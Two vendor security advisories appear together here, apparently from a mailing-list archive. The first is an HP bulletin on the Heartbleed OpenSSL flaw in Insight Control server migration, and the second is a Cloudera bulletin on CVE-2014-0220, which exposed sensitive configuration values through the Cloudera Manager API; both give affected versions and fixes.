Control server migration running OpenSSL. This is the OpenSSL vulnerability
known as Heartbleed which could be exploited remotely resulting in
disclosure of information.

Note: additional information regarding the OpenSSL Heartbleed vulnerability
concerning HP Servers products is available at the following HP Customer
Notice:

https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239413

References: CVE-2014-0160, SSRT101543

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control server migration v7.3 and v7.3.1

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                    Base Score
  CVE-2014-0160  (AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has addressed this vulnerability for HP Insight Control server migration
in the following software update.

HP Insight Management 7.3.0a available at the following location:

http://www.hp.com/go/insightupdates

HISTORY
Version: 1 (rev.1) - 30 April 2014 Initial release
Version: 2 (rev.2) - 2 June 2014 Added software update information

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact the normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.



Details for CVE-2014-0220

2014-06-05 Thread tucu
--
Technical Service Bulletin 2014-28 (TSB)

Title: Security Vulnerability: Sensitive Configuration Values Exposed in
Cloudera Manager

Certain configuration values that are stored in Cloudera Manager are
considered 'sensitive', such as database passwords. These configuration
values are expected to be inaccessible to non-admin users, and this is
enforced in the Cloudera Manager Admin Console. However, these
configuration values are not redacted when reading them through the API,
possibly making them accessible to users who should not have such access.

Products affected: Cloudera Manager

Releases affected: Cloudera Manager 4.8.2 and lower, Cloudera Manager 5.0.0

Users Affected: Cloudera Manager installations with non-admin users

Date/time of detection: May 7, 2014

Severity: High

Impact: Through the API only, non-admin users can access potentially
sensitive configuration information

CVE: CVE-2014-0220

Immediate action required:

See the following knowledge base article:

Security Vulnerability: Sensitive Configuration Values Exposed in Cloudera Manager

ETA for resolution: May 13, 2014

Addressed in release/refresh/patch: Cloudera Manager 4.8.3 and 5.0.1
--